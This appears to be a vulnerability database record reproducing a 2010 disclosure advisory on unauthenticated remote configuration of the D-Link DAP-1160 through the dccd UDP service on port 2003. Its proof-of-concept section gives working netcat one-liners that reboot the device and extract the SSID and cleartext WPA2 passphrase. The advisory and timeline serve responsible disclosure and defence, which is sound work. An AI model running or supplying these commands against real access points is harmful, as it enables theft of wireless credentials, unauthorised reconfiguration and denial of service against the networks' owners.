ID

VAR-E-201006-1275


TITLE

D-Link DAP-1160 Unauthenticated Remote Configuration

Trust: 0.5

sources: PACKETSTORM: 91243

DESCRIPTION

Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases is possible on the D-Link DAP-1160. Unauthenticated remote reboot of the device can be also performed.

Trust: 0.5

sources: PACKETSTORM: 91243

AFFECTED PRODUCTS

vendor:d linkmodel:dap-1160scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 91243

EXPLOIT

Security Advisory

IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

Advisory Information
--------------------
Published:
2010-06-28

Updated:
2010-06-28

Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06
1.30b10
1.31b01

Vulnerability Details
---------------------

Public References:
Not Assigned

Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions:
v120b06, v130b10, v131b01.
Other models and/or firmware versions may be also affected.
Note: Only firmware version major numbers are displayed on the
administration web interface: 1.20, 1.30, 1.31

Background Information:
D-Link DAP-1160 is a wireless access points that allow wireless clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported.

Summary:
Unauthenticated access and modification of several device parameters,
including Wi-Fi SSID, keys and passphrases is possible.
Unauthenticated remote reboot of the device can be also performed.

Details:
DCCD is an UDP daemon that listens on port UDP 2003 of the device, that
is likely used for easy device configuration via the DCC (D-Link Click
'n Connect) protocol.
By sending properly formatted UDP datagrams to dccd daemon it is
possible to perform security relevant operation without any previous
authentication.
It is possible to remotely retrieve sensitive wireless configuration
parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases,
along with other additional information.
It is also possible to remotely modify such parameters and configure the
device without any knowledge of the web administration password.
Remote reboot is another operation that an attacker may perform in an
unauthenticated way, possibly triggering a Denial-of-Service condition.

POC:
- Remote reboot
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003

- Retrieving Wi-Fi SSID
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt
-u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
received datagram)

- Retrieving WPA2 PSK
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' |
nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the
received datagram)

Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
POssible Denial-of-Service

Solutions & Workaround:
Not available

Additional Information
----------------------
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional
website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory

Additional information available at http://www.icysilence.org

Trust: 0.5

sources: PACKETSTORM: 91243

EXPLOIT HASH

LOCAL

SOURCE

md5: a926dcc9191d6a6206219500c389cc89
sha-1: 6607f4d71b661601d18a2caba9272f95b3c9d622
sha-256: d2a18d8f62f96dd5001bb57152b9b13a661678b95c959b8e0249b7b184879181
md5: a926dcc9191d6a6206219500c389cc89

Trust: 0.5

sources: PACKETSTORM: 91243

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 91243

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

sources: PACKETSTORM: 91243

CREDITS

Cristofaro Mune

Trust: 0.5

sources: PACKETSTORM: 91243

EXTERNAL IDS

db:PACKETSTORMid:91243

Trust: 0.5

sources: PACKETSTORM: 91243

SOURCES

db:PACKETSTORMid:91243

LAST UPDATE DATE

2022-07-27T09:54:52.941000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:91243date:2010-06-29T05:13:02